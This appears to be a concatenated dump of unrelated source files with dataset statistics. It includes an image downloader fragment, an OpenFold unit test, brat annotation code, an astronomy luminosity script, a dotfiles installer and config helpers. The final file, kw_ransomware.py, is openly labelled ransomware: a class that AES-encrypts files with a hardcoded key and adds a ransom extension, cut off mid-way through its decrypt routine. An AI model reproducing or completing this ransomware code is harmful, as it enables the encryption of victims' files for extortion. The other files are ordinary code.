Stopping.", name, selector) sys.exit(0) return el # create a config file if one does not already exist/needs to be reset def create_config_file(file_name): cfg = ConfigParser() cfg['AUTHENTICATION'] = {} cfg['AUTHENTICATION']['username'] = '' cfg['AUTHENTICATION']['password'] = '' cfg['DOWNLOADS'] = {} cfg['DOWNLOADS']['max_retries'] = '5' cfg['DOWNLOADS']['default_download_dir'] = 'download' with open(file_name, 'w') as cfg_file: cfg.write(cfg_file) print("New configuration file generated!\n") print("Please edit 'settings.ini' and input your authentication information before continuing to use this script.\n") # open an already existing config file (assumes correct items) def read_config_file(file_name): cfg = ConfigParser() cfg.read(file_name) return cfg if __name__ == "__main__": settings = 'settings.ini' config = None if isfile(settings): config = read_config_file(settings) else: create_config_file(settings) input("Press any key to exit.") exit() with Client(config) as client: client.download_images()
39.272553
129
0.589903
2,490
20,461
4.673494
0.198795
0.030076
0.037295
0.010312
0.197817
0.137492
0.114978
0.073215
0.059466
0.044169
0
0.006702
0.299936
20,461
520
130
39.348077
0.805711
0.142417
0
0.116531
0
0.00813
0.143892
0.021854
0
0
0
0.001923
0
1
0.084011
false
0.01626
0.04336
0.01626
0.208672
0.00813
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
4137ed760291cec3e1fabbc437a8f67ebd69c0e3
1,598
py
Python
tests/test_primitives.py
empyriumz/openfold
12b33cc4f72ba07ef97fbc46972bc4bbb0c7ee32
[ "Apache-2.0" ]
789
2021-11-12T16:12:21.000Z
2022-03-28T05:45:19.000Z
tests/test_primitives.py
empyriumz/openfold
12b33cc4f72ba07ef97fbc46972bc4bbb0c7ee32
[ "Apache-2.0" ]
84
2021-11-12T22:23:50.000Z
2022-03-29T01:06:06.000Z
tests/test_primitives.py
empyriumz/openfold
12b33cc4f72ba07ef97fbc46972bc4bbb0c7ee32
[ "Apache-2.0" ]
114
2021-11-12T16:00:57.000Z
2022-03-27T21:32:31.000Z
# Copyright 2021 AlQuraishi Laboratory
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import torch
import numpy as np
import unittest

from openfold.model.primitives import (
    Attention,
)
from tests.config import consts


class TestLMA(unittest.TestCase):
    def test_lma_vs_attention(self):
        batch_size = consts.batch_size
        c_hidden = 32
        n = 2**12
        no_heads = 4

        q = torch.rand(batch_size, n, c_hidden).cuda()
        kv = torch.rand(batch_size, n, c_hidden).cuda()

        bias = [torch.rand(no_heads, 1, n)]
        bias = [b.cuda() for b in bias]

        gating_fill = torch.rand(c_hidden * no_heads, c_hidden)
        o_fill = torch.rand(c_hidden, c_hidden * no_heads)

        a = Attention(
            c_hidden, c_hidden, c_hidden, c_hidden, no_heads
        ).cuda()

        with torch.no_grad():
            l = a(q, kv, biases=bias, use_lma=True)
            real = a(q, kv, biases=bias)

        self.assertTrue(torch.max(torch.abs(l - real)) < consts.eps)


if __name__ == "__main__":
    unittest.main()
29.592593
74
0.652691
232
1,598
4.344828
0.5
0.076389
0.031746
0.055556
0.175595
0.115079
0.059524
0.059524
0
0
0
0.012584
0.254068
1,598
53
75
30.150943
0.833054
0.349812
0
0
0
0
0.007805
0
0
0
0
0
0.035714
1
0.035714
false
0
0.178571
0
0.25
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
4138061cddec526c0c1ef724b4f3f7ed6a87b8dc
17,315
py
Python
server/src/textannotations.py
sandernaert/brat
6468258fcb0f83e092169d8c7e88a036077aab5c
[ "CC-BY-3.0" ]
1
2017-09-25T20:53:58.000Z
2017-09-25T20:53:58.000Z
server/src/textannotations.py
sandernaert/brat
6468258fcb0f83e092169d8c7e88a036077aab5c
[ "CC-BY-3.0" ]
null
null
null
server/src/textannotations.py
sandernaert/brat
6468258fcb0f83e092169d8c7e88a036077aab5c
[ "CC-BY-3.0" ]
null
null
null
from projectconfig import TypeHierarchyNode, ProjectConfiguration from annotation import Annotations,TextLevelAnnotation, SimpleAnnotations from message import Messager from ApplicationScope import getAnnObject class NoTextLevelConf(Exception): def __init__(self): Exception.__init__(self) def __str__(self): return u'No text level annotations defined in configuration' class noValidAnswer(Exception): def __init__(self,answer): Exception.__init__(self) self.answer = answer def __str__(self): return u'%s is not a valid answer'%(self.answer) class noValidNextStep(Exception): def __init__(self,next_step): Exception.__init__(self) self.next_step = next_step def __str__(self): return u'%s is not a valid next step, check configuration'%(self.next_step) class TextAnnotations(object): '''this is the main class for annotations on textlevel It will read the projectconf and make all necesary classes. ''' def __init__(self,projectconf, ann=""): self.projectconf = projectconf self.lists = {} self.defs = {} self.startlists = {} self.selectedList = None #ann is not the entire Annotations object but only a list of textLevel annotations self.ann = ann text_types = [] try: text_types = self.projectconf.get_text_type_hierarchy() except KeyError: raise NoTextLevelConf() for i in text_types: if i.terms[0] == "Def": answer = Answer(i.arguments["id"][0], i.arguments["text"][0]) self.defs[answer.id] = answer elif i.terms[0] == "List": answers = {} nexts = {} index = 0 for answer in i.arguments["defs"]: answers[answer] = self.defs[answer] nexts[answer] = i.arguments["next"][index] index += 1 lst = AnswerList(i.arguments["id"][0], i.arguments["name"][0],answers,nexts) self.lists[lst.id] = lst; self.startlists[lst.id] =StartList(self.defs,self.lists,lst) elif i.terms[0] == "SubList": answers = {} index = 0 check = False if "checkboxes" in i.arguments and i.arguments["checkboxes"][0] == "True": check = True for answer in i.arguments["defs"]: answers[answer] = self.defs[answer] if not check: nexts[answer] = i.arguments["next"][index] index += 1 else: nexts[answer] = i.arguments["next"][0] lst = AnswerList(i.arguments["id"][0], i.arguments["name"][0],answers,nexts,True,check) self.lists[lst.id] = lst for annotation in self.ann: #TODO:Correct error if type is not found for i in self.startlists: if self.startlists[i].start.name == annotation.type: self.startlists[i].set_ann(annotation) break def set_ann(self, annotations): self.ann = annotations for annotation in self.ann: #TODO:Correct error if type is not found for i in self.startlists: if self.startlists[i].start.name == annotation.type: self.startlists[i].set_ann(annotation) break def select(self,_id,start_list=None,current_list=None): #~ if not self.selectedList and not start_list: #~ self.selectedList = self.startlists[_id[0]] #~ return self.startlists[_id[0]].currentList if not start_list: self.selectedList = self.startlists[_id[0]] return self.startlists[_id[0]].start elif start_list: self.selectedList = self.startlists[start_list] return self.selectedList.select(_id,current_list) def unselect(self,start_list, current_id): self.selectedList = self.startlists[start_list] if self.selectedList.followed_path: return self.selectedList.unselect(current_id) else: return None class StartList(object): def __init__(self,defs,lists,currentList, ann=""): self.defs = defs self.lists = lists self.start = currentList self.currentList = currentList self.followed_path = [] self.ann = ann def set_ann(self, annotation): self.ann = annotation if self.ann: for id_ in self.ann.ids: ids = 
id_.split(';') if 'input' in ids: text = self.ann.tail.split("|")[-1] self.currentList.set_input(text) self.followed_path.append(self.currentList.id) else: self.select(ids,self.currentList.id) def select(self,_id,current_list): try: next_step,changed = self.lists[current_list].select(_id) except: raise #Will remove all following answers if one is changed if changed: found = False new_path = [] for i in self.followed_path: if found: self.lists[i].clear() else: new_path.append(i) if i == current_list: found = True self.followed_path = new_path if not current_list in self.followed_path : self.followed_path.append(current_list) if(not next_step == "stop"): try: self.currentList = self.lists[next_step] except: raise noValidNextStep(next_step) else: self.currentList = "stop" #~ if not self.currentList == "stop": #~ try: #~ next_step = self.currentList.select(_id) #~ except: #~ raise noValidAnswer(_id) #~ self.followed_path.append(self.currentList.id) #~ if(not next_step == "stop"): #~ try: #~ self.currentList = self.lists[next_step] #~ except: #~ raise noValidNextStep(next_step) #~ else: #~ self.currentList = "stop" return self.currentList def unselect(self, current_id): index = 0 found = False if current_id == 'stop': self.currentList = self.lists[self.followed_path[-1]] return self.currentList for i in self.followed_path: if i == current_id: found = True break index += 1 if index == 0: return None index -= 1 self.currentList = self.lists[self.followed_path[index]] #~ self.currentList = self.start #~ if self.ann and len(self.ann.ids) >= 1: #~ for id_ in self.ann.ids[:-1]: #~ self.select(id_.split(';'),self.currentList.id) return self.currentList class AnswerList(object): #Has an id to identify the object and a name. #Keeps a list of possible answers, and for every answer there is an value that gives says what the next_step is #this can be the id of an other (sub)list or can be "stop" def __init__(self,id, name,answers,next_steps, sublist=False, checkboxes=False): self.name = name self.id = id self.answers = answers self.nexts = next_steps self.sublist = sublist self.checkboxes = checkboxes self.answerids = [] self.answertext = [] def select(self,_id): changed = False if not self.checkboxes and self.answerids and not self.nexts[_id[0]] == self.nexts[self.answerids[0]]: changed = True self.answerids = [] self.answertext = [] for i in _id: #i can be empty if no answers were selected in the checkboxes if i: self.answerids.append(i) self.answertext.append(self.answers[i].text) #this only works for checkboxes and is needed because _id doesn't always contain a value if self.checkboxes : for i in self.nexts: return self.nexts[i],changed return self.nexts[_id[0]],changed def set_input(self, _input): self.answerids = ['input'] self.answertext = [_input] def get_ids(self): return ';'.join(self.answerids) def get_texts(self): return ';'.join(self.answertext) def clear(self): self.answerids = [] self.answertext = [] def __str__(self): return u'%s\t%s' % (self.id,self.name) class Answer(object): def __init__(self,id, text): self.id = id self.text = text def __str__(self): return u'%s\t%s' % (self.id,self.text) def get_list(path,doc): try: from os.path import join as path_join from document import real_directory real_dir = real_directory(path) except: real_dir=path ann =getAnnObject(path,doc) proj = ProjectConfiguration(real_dir) try: txt_lvl = TextAnnotations(proj,ann.get_textLevels()) except NoTextLevelConf as e: return {'exception' :str(e) } #~ if txt_lvl.currentList == "stop": #~ return {'stop':True, 
'annotation':str(txt_lvl.selectedList.ann),} response = list_to_dict(txt_lvl.selectedList.currentList) #Back_pos tells if there is still atleast 1 answer left that can be removed response["back_pos"] = False if len(txt_lvl.followed_path) >0 : response["back_pos"] = True return response def get_startlist(path,doc): try: from os.path import join as path_join from document import real_directory real_dir = real_directory(path) except: real_dir=path ann =getAnnObject(path,doc) proj = ProjectConfiguration(real_dir) try: txt_lvl = TextAnnotations(proj,ann.get_textLevels()) except NoTextLevelConf as e: return {'exception' :str(e) } response = startlist_to_dict(txt_lvl.startlists) #Back_pos tells if there is still atleast 1 answer left that can be removed response["back_pos"] = False return response def select(path,doc,_id,start_list=None, current_list=None): try: from os.path import join as path_join from document import real_directory real_dir = real_directory(path) except: real_dir=path proj = ProjectConfiguration(real_dir) try: import simplejson as json _id = json.loads(_id) txt_lvl = TextAnnotations(proj) if start_list: answerlist = txt_lvl.startlists[start_list].start with getAnnObject(path, doc) as ann: ann_txtLvl = ann.get_textLevels() annotation = None for i in ann_txtLvl: if i.type == answerlist.name: annotation = i if not annotation: ann_id = ann.get_new_id('F') ann.add_annotation(TextLevelAnnotation(ann_id, answerlist.name,[])) annotation = ann.get_ann_by_id(ann_id) ann_txtLvl = ann.get_textLevels() txt_lvl.set_ann(ann_txtLvl) response = txt_lvl.select(_id,start_list,current_list) update_annotations(ann,annotation, txt_lvl.startlists[start_list]) else: ann = getAnnObject(path,doc) ann_txtLvl = ann.get_textLevels() if ann_txtLvl: txt_lvl.set_ann(ann_txtLvl) response = txt_lvl.select(_id,start_list) except Exception,e : raise return {'exception' :str(e) } if response == "stop": return {'stop':True , 'annotation':str(txt_lvl.selectedList.ann),} return list_to_dict(response) def unselect(path,doc,start_list, current_id): try: from os.path import join as path_join from document import real_directory real_dir = real_directory(path) except: real_dir=path from message import Messager with getAnnObject(path, doc) as ann: proj = ProjectConfiguration(real_dir) ann_txtLvls = ann.get_textLevels() if not ann_txtLvls: return get_startlist(path,doc) txt_lvl = TextAnnotations(proj,ann_txtLvls) response_list = txt_lvl.unselect(start_list,current_id) #answerlist = txt_lvl.startlists[start_list].start #~ for i in ann_txtLvls: #~ if i.type == answerlist.name: #~ update_annotations(ann,i, txt_lvl.startlists[start_list]) #~ break if response_list: response = list_to_dict(response_list) else: response = get_startlist(path,doc) return response def input_text(path,doc,_id,text,start_list, current_list=None): try: from os.path import join as path_join from document import real_directory real_dir = real_directory(path) except: real_dir=path proj = ProjectConfiguration(real_dir) txt_lvl = TextAnnotations(proj) answerlist = txt_lvl.startlists[start_list].start with getAnnObject(path, doc) as ann: ann_txtLvls = ann.get_textLevels() annotation = None for i in ann_txtLvls: if i.type == answerlist.name: annotation = i if annotation: txt_lvl.set_ann(ann_txtLvls) else: ann_id = ann.get_new_id('F') ann.add_annotation(TextLevelAnnotation(ann_id, answerlist.name,[])) annotation = ann.get_ann_by_id(ann_id) #~ ann_txtLvls = ann.get_textLevels() #~ if annotation.tail: #~ annotation.tail += ";" 
txt_lvl.startlists[start_list].currentList.set_input(text) txt_lvl.startlists[start_list].currentList = 'stop' if not current_list in txt_lvl.startlists[start_list].followed_path: txt_lvl.startlists[start_list].followed_path.append(current_list) update_annotations(ann,annotation, txt_lvl.startlists[start_list]) #~ annotation.tail += text #~ annotation.ids.append(_id) return {'stop':True, 'annotation':str(annotation),} def update_annotations(ann,ann_txtLvl, txt_lvl): #update annotation for file if len(txt_lvl.followed_path) == 0: ann.del_annotation(ann_txtLvl) return 0 ann_txtLvl.tail = "" ann_txtLvl.ids = [] for i in txt_lvl.followed_path: ann_txtLvl.tail += txt_lvl.lists[i].get_texts()+'|' ann_txtLvl.ids.append(txt_lvl.lists[i].get_ids()) #remove extra ";" at end if ann_txtLvl.tail: ann_txtLvl.tail=ann_txtLvl.tail[:-1] def list_to_dict(answer_list): response = {'name':answer_list.name, 'id':answer_list.id, 'nexts':answer_list.nexts, 'sublist':answer_list.sublist, 'stop':False, 'checkboxes':answer_list.checkboxes,} keys = answer_list.answers.keys() keys.sort() response['answer_ids'] = [ a for a in keys ] response['answer_texts'] = [ answer_list.answers[a].text for a in keys ] if 'input' in answer_list.answerids: response['answers']= answer_list.answertext[0] else: response['answers']= answer_list.answerids response["back_pos"] = True return response def startlist_to_dict(answer_list): response = {'name':'', 'id':'', 'answers':[], 'sublist':False, 'stop':False,'checkboxes':False} #a is the id keys = answer_list.keys() keys.sort() response['answer_ids'] = [ a for a in keys ] response['answer_texts'] = [ answer_list[a].start.name for a in keys ] return response if __name__ == "__main__": proj = ProjectConfiguration("/home/sander/Documents/Masterproef/brat/data/brat_vb/sentiment") #~ proj.get_text_type_hierarchy() #ann = Annotations("/home/sander/Documents/Masterproef/brat/data/brat_vb/sentiment/sporza") #textann = TextAnnotations(proj,ann.get_textLevels()) #print textann.select(['0.2'],'0') #print textann.select(['1.2','1.3'],'0') #print textann.select(['5.2'],'0') #~ print "STARTLISTS" #~ print "###################" #~ print #~ print "LISTS" #~ print textann.lists #~ print "###################" #~ print #~ print "DEFS" #~ print textann.defs #~ print "###################" #~ print "#####SELECT########" #~ print textann.select('0.2','0') #detijd_other_Bekaert_12-05-05 #~ import cProfile #~ cProfile.run('get_startlist("/brat_vb/sentiment/","sporza")') print get_list("/voorbeeld/","sporza") #~ print select('/brat_vb/sentiment/','sporza','0') #~ #print "#####UNSELECT#######" #~ print unselect('/brat_vb/sentiment/','sporza','0') #~ print select('/brat_vb/sentiment/','sporza','0.1','0')
38.222958
119
0.583483
2,040
17,315
4.771569
0.104412
0.019725
0.023423
0.021574
0.486439
0.437949
0.39059
0.333984
0.321759
0.303781
0
0.005166
0.306844
17,315
452
120
38.307522
0.805866
0.147733
0
0.468391
0
0
0.038002
0.004284
0
0
0
0.002212
0
0
null
null
0
0.045977
null
null
0.002874
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
1
4138547503fa6fe8d1074b5b2c7712299cb4ca8e
55
py
Python
Python Scripts/lesson_137_main.py
jessequinn/udemy_python_complete
b97e657dea2a8680557949f01ac80d3230c82c41
[ "MIT" ]
null
null
null
Python Scripts/lesson_137_main.py
jessequinn/udemy_python_complete
b97e657dea2a8680557949f01ac80d3230c82c41
[ "MIT" ]
null
null
null
Python Scripts/lesson_137_main.py
jessequinn/udemy_python_complete
b97e657dea2a8680557949f01ac80d3230c82c41
[ "MIT" ]
null
null
null
a = 3
b = "tim"
c = 1, 2, 3

print(a)
print(b)
print(c)
6.875
11
0.509091
14
55
2
0.571429
0
0
0
0
0
0
0
0
0
0
0.097561
0.254545
55
7
12
7.857143
0.585366
0
0
0
0
0
0.054545
0
0
0
0
0
0
1
0
false
0
0
0
0
0.5
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
3
4138a7bccc894c41843ad8dd0583587c67038959
1,466
py
Python
python/Lumniosity_Converter.py
pbrown801/aggienova-templates
24f1269bf26ab8026a27df87358f80ea8ad04933
[ "MIT" ]
2
2019-09-23T18:42:12.000Z
2019-09-30T04:17:10.000Z
python/Lumniosity_Converter.py
pbrown801/aggienova-templates
24f1269bf26ab8026a27df87358f80ea8ad04933
[ "MIT" ]
12
2019-02-20T18:38:25.000Z
2022-03-13T02:32:57.000Z
python/Lumniosity_Converter.py
pbrown801/aggienova-templates
24f1269bf26ab8026a27df87358f80ea8ad04933
[ "MIT" ]
1
2020-01-14T17:26:33.000Z
2020-01-14T17:26:33.000Z
import pandas as pd
import numpy as np
import math
from dust_extinction.parameter_averages import F19


def extinction_adjustment(rv):
    len_wave = len(sn_templ['Wavelength'])
    wavenum_waves = [1 / (a / 10000) for a in sn_templ['Wavelength']]
    ext_model = F19(Rv=rv)
    return pd.Series(ext_model(wavenum_waves))


def Dm_to_Lum(sn_name):
    def Grab_Lum(Dist_mod, Flux):
        P_cm = 3.08567758128 * 10**18
        D_cm = 10**((Dist_mod / 5) + 1) * P_cm
        S_a = 4 * np.pi * D_cm**2
        lum = Flux * S_a
        return lum

    idex = swift.loc[swift.isin([sn_name]).any(axis=1)].index.tolist()
    idex = idex[0]
    Dist_mod = swift['Dist_mod_cor'][idex]
    Lum = pd.Series(sn_templ.apply(
        lambda row: Grab_Lum(Dist_mod=Dist_mod, Flux=row['Flux']), axis=1))
    Lum = Lum / extinction_adjustment(3.1)
    Lum = pd.DataFrame({'MJD': sn_templ['MJD'],
                        'Wavelength': sn_templ['Wavelength'],
                        'Luminosity': Lum.tolist()})
    return Lum


def Lum_conv(sn_name, output_file):
    global swift
    swift = pd.read_csv('../input/NewSwiftSNweblist.csv')
    global sn_templ
    '''Input desired template file name with Flux'''
    sn_templ = pd.read_csv(output_file)
    sn_name = sn_name.replace("_uvot", "")
    '''Input name of supernovae'''
    lum_templ = Dm_to_Lum(sn_name)
    return lum_templ


if __name__ == "__main__":
    l = Lum_conv('SN2005cs_uvot',
                 '../output/TEMPLATE/SN2005cs_uvot_SNIa_series_template.csv')
    # print(type(l))
    # extinction_adjustment(3.1)
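The core of Grab_Lum() above is the standard distance-modulus conversion: D = 10^(mu/5 + 1) parsecs, then L = 4 * pi * D^2 * F. A standalone sketch of that arithmetic; the distance modulus and flux values below are made up for demonstration.

import numpy as np

P_cm = 3.08567758128e18          # one parsec in centimetres, as in Grab_Lum()
dist_mod = 29.6                  # hypothetical distance modulus (mag)
flux = 1.0e-14                   # hypothetical flux (erg / s / cm^2)

d_cm = 10**((dist_mod / 5) + 1) * P_cm   # luminosity distance in cm
lum = flux * 4 * np.pi * d_cm**2         # luminosity in erg / s
print(f"{lum:.3e} erg/s")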
28.745098
112
0.677353
230
1,466
4.03913
0.391304
0.052745
0.054898
0.019376
0.027987
0
0
0
0
0
0
0.038907
0.175989
1,466
51
113
28.745098
0.730132
0.027967
0
0
0
0
0.137546
0.064684
0
0
0
0
0
1
0.121212
false
0
0.121212
0
0.333333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
413b8b891d2f44221bdddfd4cafbe2d545ac748d
4,076
py
Python
bin/dotty.py
jgrip/dotfiles
78e96c3eaa1bb64d9197b23115bb1f144d4ca184
[ "Unlicense" ]
null
null
null
bin/dotty.py
jgrip/dotfiles
78e96c3eaa1bb64d9197b23115bb1f144d4ca184
[ "Unlicense" ]
null
null
null
bin/dotty.py
jgrip/dotfiles
78e96c3eaa1bb64d9197b23115bb1f144d4ca184
[ "Unlicense" ]
null
null
null
#!/usr/bin/env python3
from __future__ import print_function

# Copyright (C) 2015 Vibhav Pant <vibhavp@gmail.com>

# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.

# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.

# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

import json
import os
import shutil
from sys import stderr
import argparse

# Fix Python 2.x.
try:
    input = raw_input
except NameError:
    pass


def ask_user(prompt):
    valid = {"yes": True, 'y': True, '': True, "no": False, 'n': False}
    while True:
        print("{0} ".format(prompt), end="")
        choice = input().lower()
        if choice in valid:
            return valid[choice]
        else:
            print("Enter a correct choice.", file=stderr)


def create_directory(path):
    exp = os.path.expanduser(path)
    if not os.path.isdir(exp):
        print("{0} doesn't exist, creating.".format(exp))
        os.makedirs(exp)


def create_symlink(src, dest, replace):
    dest = os.path.expanduser(dest)
    src = os.path.abspath(src)
    broken_symlink = os.path.lexists(dest) and not os.path.exists(dest)
    if os.path.lexists(dest):
        if os.path.islink(dest) and os.readlink(dest) == src:
            print("Skipping existing {0} -> {1}".format(dest, src))
            return
        elif replace or ask_user("{0} exists, delete it? [Y/n]".format(dest)):
            if os.path.isfile(dest) or broken_symlink or os.path.islink(dest):
                os.remove(dest)
            else:
                shutil.rmtree(dest)
        else:
            return
    print("Linking {0} -> {1}".format(dest, src))
    try:
        os.symlink(src, dest)
    except AttributeError:
        # os.symlink may be missing on Windows under Python 2;
        # fall back to the Win32 API via ctypes.
        import ctypes
        symlink = ctypes.windll.kernel32.CreateSymbolicLinkW
        symlink.argtypes = (ctypes.c_wchar_p, ctypes.c_wchar_p, ctypes.c_uint32)
        symlink.restype = ctypes.c_ubyte
        flags = 1 if os.path.isdir(src) else 0
        symlink(dest, src, flags)


def copy_path(src, dest):
    dest = os.path.expanduser(dest)
    src = os.path.abspath(src)
    if os.path.exists(dest):
        if ask_user("{0} exists, delete it? [Y/n]".format(dest)):
            if os.path.isfile(dest) or os.path.islink(dest):
                os.remove(dest)
            else:
                shutil.rmtree(dest)
        else:
            return
    print("Copying {0} -> {1}".format(src, dest))
    if os.path.isfile(src):
        shutil.copy(src, dest)
    else:
        shutil.copytree(src, dest)


def run_command(command):
    print("Running {0}".format(command))
    os.system(command)


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("config", help="the JSON file you want to use")
    parser.add_argument("-r", "--replace", action="store_true",
                        help="replace files/folders if they already exist")
    args = parser.parse_args()
    js = json.load(open(args.config))
    os.chdir(os.path.expanduser(os.path.abspath(os.path.dirname(args.config))))
    if 'directories' in js:
        [create_directory(path) for path in js['directories']]
    if 'link' in js:
        [create_symlink(src, dst, args.replace) for src, dst in js['link'].items()]
    if 'copy' in js:
        [copy_path(src, dst) for src, dst in js['copy'].items()]
    if 'install' in js and 'install_cmd' in js:
        packages = ' '.join(js['install'])
        run_command("{0} {1}".format(js['install_cmd'], packages))
    if 'commands' in js:
        [run_command(command) for command in js['commands']]
    print("Done!")


if __name__ == "__main__":
    main()
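main() above looks for the keys 'directories', 'link', 'copy', 'install', 'install_cmd', and 'commands' in the JSON config it is given. A sketch of a matching config; the paths and package names are illustrative, not part of the original repo.

import json

config = {
    "directories": ["~/.config"],
    "link": {"vimrc": "~/.vimrc"},          # repo file -> symlink destination
    "copy": {"gitconfig": "~/.gitconfig"},  # repo file -> copied destination
    "install": ["git", "vim"],
    "install_cmd": "sudo apt install -y",   # prepended to the package list
    "commands": ["echo dotfiles installed"],
}

with open("dotty.json", "w") as f:
    json.dump(config, f, indent=2)
# Then: python3 dotty.py dotty.json --replace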
34.837607
96
0.639352
581
4,076
4.416523
0.359725
0.046765
0.021824
0.023383
0.213172
0.160171
0.125487
0.125487
0.125487
0.125487
0
0.011832
0.232826
4,076
116
97
35.137931
0.808762
0.187929
0
0.202381
0
0
0.121966
0
0
0
0
0
0
1
0.071429
false
0.011905
0.083333
0
0.202381
0.107143
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
413c30019b7152204c51cd4030495eeb971c8934
2,472
py
Python
sltxpkg/config.py
EagleoutIce/sltx-inst
cb45346177c22fd5bf47f29cebf34f09f16b9a4b
[ "MIT" ]
null
null
null
sltxpkg/config.py
EagleoutIce/sltx-inst
cb45346177c22fd5bf47f29cebf34f09f16b9a4b
[ "MIT" ]
null
null
null
sltxpkg/config.py
EagleoutIce/sltx-inst
cb45346177c22fd5bf47f29cebf34f09f16b9a4b
[ "MIT" ]
null
null
null
import os
import sys
from pathlib import Path

from sltxpkg import globals as sg
from sltxpkg import util as su
from sltxpkg.globals import (C_CACHE_DIR, C_CREATE_DIRS, C_DOWNLOAD_DIR,
                             C_DRIVER_LOG, C_TEX_HOME, C_WORKING_DIR)
from sltxpkg.log_control import LOGGER
from sltxpkg.types import SltxDependencies


def write_to_log(data: str):
    if sg.configuration[C_DRIVER_LOG].strip():
        with open(sg.configuration[C_DRIVER_LOG], 'a') as f:
            f.write(data)
            if not data.endswith('\n'):
                f.write("\n")


def load_configuration(file: str):
    """Apply given configuration file to the sltx config

    Args:
        file (str): The configuration file to load
    """
    y_conf = su.load_yaml(file)
    sg.configuration = {**sg.configuration, **y_conf}


def expand_url(path: str, cwd: Path) -> str:
    return "" if path is None else path.format(cwd=str(cwd.parent))


def load_dependencies_config(file: str, target: dict) -> SltxDependencies:
    """Apply given dependency file to the sltx dep list

    Args:
        file (str): The file to load
        target (dict): The target dependency-collection to append it to
            (won't be modified)

    Returns:
        dict: The target dict with the added dependencies
    """
    y_dep = su.load_yaml(file)
    if 'dependencies' in y_dep:
        for dep in y_dep['dependencies']:
            dep_data = y_dep['dependencies'][dep]
            if 'url' in dep_data:
                dep_data['url'] = expand_url(
                    dep_data['url'], Path(file).absolute())
    return {**target, **y_dep}


def assure_dir(name: str, target_path: str, create: bool):
    if not os.path.isdir(target_path):
        if create:
            LOGGER.info("> %s: %s not found. Creating...", name, target_path)
            os.makedirs(target_path)
        else:
            LOGGER.error("! Not allowed to create " + name + ". Exit")
            sys.exit(1)


def assure_dirs():
    sg.configuration[C_TEX_HOME] = su.get_sltx_tex_home()  # expansion
    create = sg.configuration[C_CREATE_DIRS]
    assure_dir('Tex-Home', sg.configuration[C_TEX_HOME], create)
    for config, name in [(C_WORKING_DIR, 'Working-Dir'),
                         (C_DOWNLOAD_DIR, 'Download-Dir'),
                         (C_CACHE_DIR, 'Cache-Dir')]:
        sg.configuration[config] = os.path.expanduser(
            sg.configuration[config])  # expansion
        assure_dir(name, sg.configuration[config], create)
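expand_url() above substitutes a '{cwd}' placeholder in a dependency URL with the directory of the file that declared the dependency. A minimal self-contained sketch of that behavior (the function is restated locally and the path is illustrative):

from pathlib import Path

def expand_url(path, cwd):
    # '{cwd}' expands to the parent directory of the declaring file.
    return "" if path is None else path.format(cwd=str(cwd.parent))

print(expand_url("file://{cwd}/local-pkg",
                 Path("/home/me/project/sltx-dep.yaml")))
# -> file:///home/me/project/local-pkg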
32.96
91
0.636327
342
2,472
4.423977
0.280702
0.099141
0.052875
0.029081
0.06345
0
0
0
0
0
0
0.00054
0.250809
2,472
74
92
33.405405
0.816415
0.147654
0
0
0
0
0.073408
0
0
0
0
0
0
1
0.130435
false
0
0.173913
0.021739
0.347826
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
413c68cef2a9cdf443fb29e050740dc6fceb6953
2,896
py
Python
kw_ransomware.py
CodmingOut/SecretProjectAI
addc43117eab30a25453c18fa042739c33cc6cfb
[ "MIT" ]
null
null
null
kw_ransomware.py
CodmingOut/SecretProjectAI
addc43117eab30a25453c18fa042739c33cc6cfb
[ "MIT" ]
null
null
null
kw_ransomware.py
CodmingOut/SecretProjectAI
addc43117eab30a25453c18fa042739c33cc6cfb
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Tue Nov 24 21:32:11 2020 @author: kw """ import glob import os, random, struct import getpass from Cryptodome.Cipher import AES class makeMyRansomware: def __init__(self, your_extension=".Example", key=b'keyfor16bytes123', username=getpass.getuser()): self.your_extension = your_extension self.key = key self.username = username def encrypt_file(self, key, in_filename, out_filename=None, chunksize=64*1024): if not out_filename: out_filename = in_filename + self.your_extension iv = os.urandom(16) encryptor = AES.new(key ,AES.MODE_CBC, iv) filesize = os.path.getsize(in_filename) with open(in_filename, 'rb') as infile: with open(out_filename, 'wb') as outfile: outfile.write(struct.pack('<Q', filesize)) outfile.write(iv) while True: chunk = infile.read(chunksize) if len(chunk) == 0: break elif len(chunk) % 16 != 0: chunk += b' ' * (16 - len(chunk) % 16) outfile.write(encryptor.encrypt(chunk)) def decrypt_file(self, key, in_filename, out_filename=None, chunksize=24*1024): if not out_filename: out_filename = os.path.splitext(in_filename)[0] with open(in_filename, 'rb') as infile: origsize = 